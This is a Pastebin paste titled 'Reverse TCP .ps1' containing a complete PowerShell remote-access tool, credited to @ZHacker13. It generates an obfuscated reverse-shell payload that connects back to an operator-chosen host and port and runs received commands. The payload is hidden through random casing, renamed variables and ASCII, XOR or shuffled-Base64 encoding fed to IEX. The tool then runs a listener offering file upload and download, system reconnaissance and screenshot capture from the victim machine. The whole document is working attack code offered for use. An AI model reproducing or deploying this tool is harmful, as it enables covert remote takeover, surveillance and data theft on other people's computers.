API tools faq
paste
Advertisement
syst3m_h4x0r

Reverse TCP .ps1

syst3m_h4x0r
Jan 4th, 2020
15,904
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 14.78 KB | None | 0 0
raw download clone embed print report
  1. function Character_Obfuscation($String)
  2. {
  3. $String = $String.toCharArray();
  4.  
  5. Foreach($Letter in $String)
  6. {
  7. $RandomNumber = (1..2) | Get-Random;
  8.  
  9. If($RandomNumber -eq "1")
  10. {
  11. $Letter = "$Letter".ToLower();
  12. }
  13.  
  14. If($RandomNumber -eq "2")
  15. {
  16. $Letter = "$Letter".ToUpper();
  17. }
  18.  
  19. $RandomString += $Letter;
  20. $RandomNumber = $Null;
  21. }
  22.  
  23. $String = $RandomString;
  24. Return $String;
  25. }
  26.  
  27. function Variable_Obfuscation($String)
  28. {
  29. $RandomVariable = (0..99);
  30.  
  31. For($i = 0; $i -lt $RandomVariable.count; $i++)
  32. {
  33. $Temp = (-Join ((65..90) + (97..122) | Get-Random -Count 5 | % {[char]$_}));
  34.  
  35. While($RandomVariable -like "$Temp")
  36. {
  37. $Temp = (-Join ((65..90) + (97..122) | Get-Random -Count 5 | % {[char]$_}));
  38. }
  39.  
  40. $RandomVariable[$i] = $Temp;
  41. $Temp = $Null;
  42. }
  43.  
  44. $RandomString = $String;
  45.  
  46. For($x = $RandomVariable.count; $x -ge 1; $x--)
  47. {
  48. $Temp = $RandomVariable[$x-1];
  49. $RandomString = "$RandomString" -replace "\`$$x", "`$$Temp";
  50. }
  51.  
  52. $String = $RandomString;
  53. Return $String;
  54. }
  55.  
  56. function ASCII_Obfuscation($String)
  57. {
  58. $PowerShell = "IEX(-Join((@)|%{[char]`$_}));Exit";
  59. $CMD = "ECHO `"IEX(-Join((@)|%{[char]```$_}));Exit`" | PowerShell `"IEX(IEX(`$input))`"&Exit";
  60.  
  61. $String = [System.Text.Encoding]::ASCII.GetBytes($String) -join ',';
  62.  
  63. $PowerShell = Character_Obfuscation($PowerShell);
  64. $PowerShell = $PowerShell -replace "@","$String";
  65.  
  66. $CMD = Character_Obfuscation($CMD);
  67. $CMD = $CMD -replace "@","$String";
  68.  
  69. Return $PowerShell,$CMD;
  70. }
  71.  
  72. function Base64_Obfuscation($String)
  73. {
  74. $PowerShell = "IEX([Text.Encoding]::ASCII.GetString([Convert]::FromBase64String(([Text.Encoding]::ASCII.GetString(([Text.Encoding]::ASCII.GetBytes({@})|Sort-Object {Get-Random -SetSeed #}))))));Exit";
  75. $CMD = "ECHO `"IEX([Text.Encoding]::ASCII.GetString([Convert]::FromBase64String(([Text.Encoding]::ASCII.GetString(([Text.Encoding]::ASCII.GetBytes({@})|Sort-Object {Get-Random -SetSeed #}))))));Exit`" | PowerShell `"IEX(IEX(`$input))`"&Exit";
  76.  
  77. $Seed = (Get-Random -Minimum 0 -Maximum 999999999).ToString('000000000');
  78. $String = [Text.Encoding]::ASCII.GetString(([Text.Encoding]::ASCII.GetBytes([Convert]::ToBase64String([System.Text.Encoding]::ASCII.GetBytes($String))) | Sort-Object {Get-Random -SetSeed $Seed}));
  79.  
  80. $PowerShell = Character_Obfuscation($PowerShell);
  81. $PowerShell = $PowerShell -replace "@","$String";
  82. $PowerShell = $PowerShell -replace "#","$Seed";
  83.  
  84. $CMD = Character_Obfuscation($CMD);
  85. $CMD = $CMD -replace "@","$String";
  86. $CMD = $CMD -replace "#","$Seed";
  87.  
  88. Return $PowerShell,$CMD;
  89. }
  90.  
  91. function BXOR_Obfuscation($String)
  92. {
  93. $PowerShell = "IEX(-Join((@)|%{[char](`$_-BXOR #)}));Exit";
  94. $CMD = "ECHO `"IEX(-Join((@)|%{[char](```$_-BXOR #)}));Exit`" | PowerShell `"IEX(IEX(`$input))`"&Exit";
  95.  
  96. $Key = '0x' + ((0..5) | Get-Random) + ((0..9) + ((65..70) + (97..102) | % {[char]$_}) | Get-Random);
  97. $String = ([System.Text.Encoding]::ASCII.GetBytes($String) | % {$_ -BXOR $Key}) -join ',';
  98.  
  99. $PowerShell = Character_Obfuscation($PowerShell);
  100. $PowerShell = $PowerShell -replace "@","$String";
  101. $PowerShell = $PowerShell -replace "#","$Key";
  102.  
  103. $CMD = Character_Obfuscation($CMD);
  104. $CMD = $CMD -replace "@","$String";
  105. $CMD = $CMD -replace "#","$Key";
  106.  
  107. Return $PowerShell,$CMD;
  108. }
  109.  
  110. function Payload($IP,$Port,$Base64_Key)
  111. {
  112. $Payload = "`$1=[System.Byte[]]::CreateInstance([System.Byte],1024);`$2=([Convert]::FromBase64String(`"@`"));`$3=`"#`";`$4=IEX([System.Runtime.InteropServices.Marshal]::PtrToStringAuto([System.Runtime.InteropServices.Marshal]::SecureStringToBSTR((`$3|ConvertTo-SecureString -Key `$2))));While(`$5=`$4.GetStream()){;While(`$5.DataAvailable -or `$6 -eq `$1.count){;`$6=`$5.Read(`$1,0,`$1.length);`$7+=(New-Object -TypeName System.Text.ASCIIEncoding).GetString(`$1,0,`$6)};If(`$7){;`$8=(IEX(`$7)2>&1|Out-String);If(!(`$8.length%`$1.count)){;`$8+=`" `"};`$9=([text.encoding]::ASCII).GetBytes(`$8);`$5.Write(`$9,0,`$9.length);`$5.Flush();`$7=`$Null}}";
  113.  
  114. $Key = ([Convert]::FromBase64String($Base64_Key));
  115. $C2 = ConvertTo-SecureString "New-Object System.Net.Sockets.TCPClient('$IP',$Port)" -AsPlainText -Force | ConvertFrom-SecureString -Key $Key;
  116.  
  117. $Payload = Variable_Obfuscation(Character_Obfuscation($Payload));
  118. $Payload = $Payload -replace "@","$Base64_Key";
  119. $Payload = $Payload -replace "#","$C2";
  120.  
  121. Return $Payload;
  122. }
  123.  
  124. $Modules = @"
  125.  
  126.  
  127. _____ _______ _____ _____ _____ _ _ _ _
  128. | __ \ |__ __/ ____| __ \ / ____| | | | | | |
  129. | |__) |_____ _____ _ __ ___ ___| | | | | |__) | | (___ | |__| | ___| | |
  130. | _ // _ \ \ / / _ \ '__/ __|/ _ \ | | | | ___/ \___ \| __ |/ _ \ | |
  131. | | \ \ __/\ V / __/ | \__ \ __/ | | |____| | ____) | | | | __/ | |
  132. |_| \_\___| \_/ \___|_| |___/\___|_| \_____|_| |_____/|_| |_|\___|_|_|
  133.  
  134. - By: @ZHacker13
  135.  
  136. - | Modules | - Show C2-Server Modules.
  137. - | Info | - Show Remote-Host Info.
  138. - | Upload | - Upload File from Local-Host to Remote-Host.
  139. - | Download | - Download File from Remote-Host to Local-Host.
  140. - | Screenshot | - Save Screenshot from Remote-Host to Local-Host.
  141.  
  142.  
  143. "@;
  144.  
  145. Clear-Host;
  146. Write-Host $Modules;
  147.  
  148. Write-Host " - Local Host: " -NoNewline;
  149. $Local_Host = Read-Host;
  150.  
  151. While(!($Local_Port))
  152. {
  153. Write-Host " - Local Port: " -NoNewline;
  154. $Local_Port = Read-Host;
  155.  
  156. netstat -na | Select-String LISTENING | % {
  157.  
  158. If(($_.ToString().split(":")[1].split(" ")[0]) -eq "$Local_Port")
  159. {
  160. $Local_Port = $Null;
  161. }
  162. }
  163. }
  164.  
  165. $Key = (1..32 | % {[byte](Get-Random -Minimum 0 -Maximum 255)});
  166. $Base64_Key = [Convert]::ToBase64String($Key);
  167.  
  168. Write-Host "`n [*] Generate Payload ! [*]";
  169. Write-Host " [*] Please Wait ... [*]";
  170.  
  171. $Payload = Payload -IP $Local_Host -Port $Local_Port -Base64_Key $Base64_Key;
  172.  
  173. Write-Host " [*] Success ! [*]";
  174. $Choices = (1..3);
  175.  
  176. While(!($Choices -like "$Choice"))
  177. {
  178. Write-Host "`n [*] Obfuscation Type: [*]";
  179.  
  180. Write-Host "`n 1 = ASCII";
  181. Write-Host " 2 = BXOR";
  182. Write-Host " 3 = Base64";
  183.  
  184. Write-Host "`n >>> " -NoNewline;
  185. $Choice = Read-Host;
  186. }
  187.  
  188. Clear-Host;
  189. Write-Host $Modules;
  190.  
  191. Write-Host " - Local Host: $Local_Host";
  192. Write-Host " - Local Port: $Local_Port";
  193.  
  194. If($Choice -eq "1")
  195. {
  196. Write-Host "`n [*] Obfuscation Type: ASCII [*]";
  197. $Payload = ASCII_Obfuscation($Payload);
  198. }
  199.  
  200. If($Choice -eq "2")
  201. {
  202. Write-Host "`n [*] Obfuscation Type: BXOR [*]";
  203. $Payload = BXOR_Obfuscation($Payload);
  204. }
  205.  
  206. If($Choice -eq "3")
  207. {
  208. Write-Host "`n [*] Obfuscation Type: Base64 [*]";
  209. $Payload = Base64_Obfuscation($Payload);
  210. }
  211.  
  212. $PowerShell_Payload = $Payload[0];
  213. $CMD_Payload = $Payload[1];
  214.  
  215. Write-Host "`n [*] PowerShell Payload: [*]`n`n$PowerShell_Payload";
  216. Write-Host "`n [*] CMD Payload: [*]`n`n$CMD_Payload`n";
  217.  
  218. $Bytes = [System.Byte[]]::CreateInstance([System.Byte],1024);
  219. Write-Host "`n [*] Listeneing on Port `"$Local_Port`" [*]";
  220. $Socket = New-Object System.Net.Sockets.TcpListener('0.0.0.0',$Local_Port);
  221. $Socket.Start();
  222. $Client = $Socket.AcceptTcpClient();
  223. $Remote_Host = $Client.Client.RemoteEndPoint.Address.IPAddressToString;
  224. Write-Host " [*] Connection ! `"$Remote_Host`" [*]";
  225. Write-Host " [*] Please Wait ... [*]";
  226. $Stream = $Client.GetStream();
  227.  
  228. $WaitData = $False;
  229. $Info = $Null;
  230.  
  231. $System = Character_Obfuscation("(Get-WmiObject Win32_OperatingSystem).Caption");
  232. $Version = Character_Obfuscation("(Get-WmiObject Win32_OperatingSystem).Version");
  233. $Architecture = Character_Obfuscation("(Get-WmiObject Win32_OperatingSystem).OSArchitecture");
  234. $Name = Character_Obfuscation("(Get-WmiObject Win32_OperatingSystem).CSName");
  235. $WindowsDirectory = Character_Obfuscation("(Get-WmiObject Win32_OperatingSystem).WindowsDirectory");
  236.  
  237. $Command = "`" - Host: `"+`"$Remote_Host`"+`"``n - System: `"+$System+`"``n - Version: `"+$Version+`"``n - Architecture: `"+$Architecture+`"``n - Name: `"+$Name+`"``n - WindowsDirectory: `"+$WindowsDirectory";
  238.  
  239. While($Client.Connected)
  240. {
  241. If(!($WaitData))
  242. {
  243. If(!($Command))
  244. {
  245. Write-Host " - Command: " -NoNewline;
  246. $Command = Read-Host;
  247. }
  248.  
  249. If($Command -eq "Modules")
  250. {
  251. Write-Host "`n$Modules";
  252. $Command = $Null;
  253. }
  254.  
  255. If($Command -eq "Info")
  256. {
  257. Write-Host "`n$Info";
  258. $Command = $Null;
  259. }
  260.  
  261. If($Command -eq "Screenshot")
  262. {
  263. $File = -join ((65..90) + (97..122) | Get-Random -Count 15 | % {[char]$_});
  264. Write-Host "`n - Screenshot File: $File.png";
  265. Write-Host "`n [*] Please Wait ... [*]";
  266. $Command = "`$1=`"`$env:temp\#`";Add-Type -AssemblyName System.Windows.Forms;`$2=New-Object System.Drawing.Bitmap([System.Windows.Forms.Screen]::PrimaryScreen.Bounds.Width,[System.Windows.Forms.Screen]::PrimaryScreen.Bounds.Height);`$3=[System.Drawing.Graphics]::FromImage(`$2);`$3.CopyFromScreen((New-Object System.Drawing.Point(0,0)),(New-Object System.Drawing.Point(0,0)),`$2.Size);`$3.Dispose();`$2.Save(`"`$1`");If(([System.IO.File]::Exists(`"`$1`"))){[io.file]::ReadAllBytes(`"`$1`") -join ',';Remove-Item -Path `"`$1`" -Force}";
  267. $Command = Variable_Obfuscation(Character_Obfuscation($Command));
  268. $Command = $Command -replace "#","$File";
  269. $File = "$pwd\$File.png";
  270. $Save = $True;
  271. }
  272.  
  273. If($Command -eq "Download")
  274. {
  275. Write-Host "`n - Download File: " -NoNewline;
  276. $File = Read-Host;
  277.  
  278. If(!("$File" -like "* *") -and !([string]::IsNullOrEmpty($File)))
  279. {
  280. Write-Host "`n [*] Please Wait ... [*]";
  281. $Command = "`$1=`"#`";If(!(`"`$1`" -like `"*\*`") -and !(`"`$1`" -like `"*/*`")){`$1=`"`$pwd\`$1`"};If(([System.IO.File]::Exists(`"`$1`"))){[io.file]::ReadAllBytes(`"`$1`") -join ','}";
  282. $Command = Variable_Obfuscation(Character_Obfuscation($Command));
  283. $Command = $Command -replace "#","$File";
  284. $File = $File.Split('\')[-1];
  285. $File = $File.Split('/')[-1];
  286. $File = "$pwd\$File";
  287. $Save = $True;
  288.  
  289. } Else {
  290.  
  291. Write-Host "`n";
  292. $File = $Null;
  293. $Command = $Null;
  294. }
  295. }
  296.  
  297. If($Command -eq "Upload")
  298. {
  299. Write-Host "`n - Upload File: " -NoNewline;
  300. $File = Read-Host;
  301.  
  302. If(!("$File" -like "* *") -and !([string]::IsNullOrEmpty($File)))
  303. {
  304. Write-Host "`n [*] Please Wait ... [*]";
  305.  
  306. If(!("$File" -like "*\*") -and !("$File" -like "*/*"))
  307. {
  308. $File = "$pwd\$File";
  309. }
  310.  
  311. If(([System.IO.File]::Exists("$File")))
  312. {
  313. $FileBytes = [io.file]::ReadAllBytes("$File") -join ',';
  314. $FileBytes = "($FileBytes)";
  315. $File = $File.Split('\')[-1];
  316. $File = $File.Split('/')[-1];
  317. $Command = "`$1=`"`$pwd\#`";`$2=@;If(!([System.IO.File]::Exists(`"`$1`"))){[System.IO.File]::WriteAllBytes(`"`$1`",`$2);`"`$1 [*]`"}";
  318. $Command = Variable_Obfuscation(Character_Obfuscation($Command));
  319. $Command = $Command -replace "#","$File";
  320. $Command = $Command -replace "@","$FileBytes";
  321. $Upload = $True;
  322.  
  323. } Else {
  324.  
  325. Write-Host " [*] Failed ! [*]";
  326. Write-Host " [*] File Missing [*]`n";
  327. $Command = $Null;
  328. }
  329.  
  330. } Else {
  331.  
  332. Write-Host "`n";
  333. $Command = $Null;
  334. }
  335.  
  336. $File = $Null;
  337. }
  338.  
  339. If(!([string]::IsNullOrEmpty($Command)))
  340. {
  341. If(!($Command.length % $Bytes.count))
  342. {
  343. $Command += " ";
  344. }
  345.  
  346. $SendByte = ([text.encoding]::ASCII).GetBytes($Command);
  347.  
  348. Try {
  349.  
  350. $Stream.Write($SendByte,0,$SendByte.length);
  351. $Stream.Flush();
  352. }
  353.  
  354. Catch {
  355.  
  356. Write-Host "`n [*] Connection Lost ! [*]`n";
  357. $Socket.Stop();
  358. $Client.Close();
  359. $Stream.Dispose();
  360. Exit;
  361. }
  362.  
  363. $WaitData = $True;
  364. }
  365.  
  366. If($Command -eq "Exit")
  367. {
  368. Write-Host "`n [*] Connection Lost ! [*]`n";
  369. $Socket.Stop();
  370. $Client.Close();
  371. $Stream.Dispose();
  372. Exit;
  373. }
  374.  
  375. If($Command -eq "Clear" -or $Command -eq "Cls" -or $Command -eq "Clear-Host")
  376. {
  377. Clear-Host;
  378. Write-Host "`n$Modules";
  379. }
  380.  
  381. $Command = $Null;
  382. }
  383.  
  384. If($WaitData)
  385. {
  386. While(!($Stream.DataAvailable))
  387. {
  388. Start-Sleep -Milliseconds 1;
  389. }
  390.  
  391. If($Stream.DataAvailable)
  392. {
  393. While($Stream.DataAvailable -or $Read -eq $Bytes.count)
  394. {
  395. Try {
  396.  
  397. If(!($Stream.DataAvailable))
  398. {
  399. $Temp = 0;
  400.  
  401. While(!($Stream.DataAvailable) -and $Temp -lt 1000)
  402. {
  403. Start-Sleep -Milliseconds 1;
  404. $Temp++;
  405. }
  406.  
  407. If(!($Stream.DataAvailable))
  408. {
  409. Write-Host "`n [*] Connection Lost ! [*]`n";
  410. $Socket.Stop();
  411. $Client.Close();
  412. $Stream.Dispose();
  413. Exit;
  414. }
  415. }
  416.  
  417. $Read = $Stream.Read($Bytes,0,$Bytes.length);
  418. $OutPut += (New-Object -TypeName System.Text.ASCIIEncoding).GetString($Bytes,0,$Read);
  419. }
  420.  
  421. Catch {
  422.  
  423. Write-Host "`n [*] Connection Lost ! [*]`n";
  424. $Socket.Stop();
  425. $Client.Close();
  426. $Stream.Dispose();
  427. Exit;
  428. }
  429. }
  430.  
  431. If(!($Info))
  432. {
  433. $Info = "$OutPut";
  434. }
  435.  
  436. If($OutPut -ne " " -and !($Save) -and !($Upload))
  437. {
  438. Write-Host "`n$OutPut";
  439. }
  440.  
  441. If($Save)
  442. {
  443. If($OutPut -ne " ")
  444. {
  445. If(!([System.IO.File]::Exists("$File")))
  446. {
  447. $FileBytes = IEX("($OutPut)");
  448. [System.IO.File]::WriteAllBytes("$File",$FileBytes);
  449. Write-Host " [*] Success ! [*]";
  450. Write-Host " [*] File Saved: $File [*]`n";
  451.  
  452. } Else {
  453.  
  454. Write-Host " [*] Failed ! [*]";
  455. Write-Host " [*] File already Exists [*]`n";
  456. }
  457. } Else {
  458.  
  459. Write-Host " [*] Failed ! [*]";
  460. Write-Host " [*] File Missing [*]`n";
  461. }
  462.  
  463. $File = $Null;
  464. $Save = $False;
  465. }
  466.  
  467. If($Upload)
  468. {
  469. If($OutPut -ne " ")
  470. {
  471. $OutPut = $OutPut -replace "`n","";
  472. Write-Host " [*] Success ! [*]";
  473. Write-Host " [*] File Uploaded: $OutPut`n";
  474.  
  475. } Else {
  476.  
  477. Write-Host " [*] Failed ! [*]";
  478. Write-Host " [*] File already Exists [*]`n";
  479. }
  480.  
  481. $Upload = $False;
  482. }
  483.  
  484. $WaitData = $False;
  485. $Read = $Null;
  486. $OutPut = $Null;
  487. }
  488. }
  489. }
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!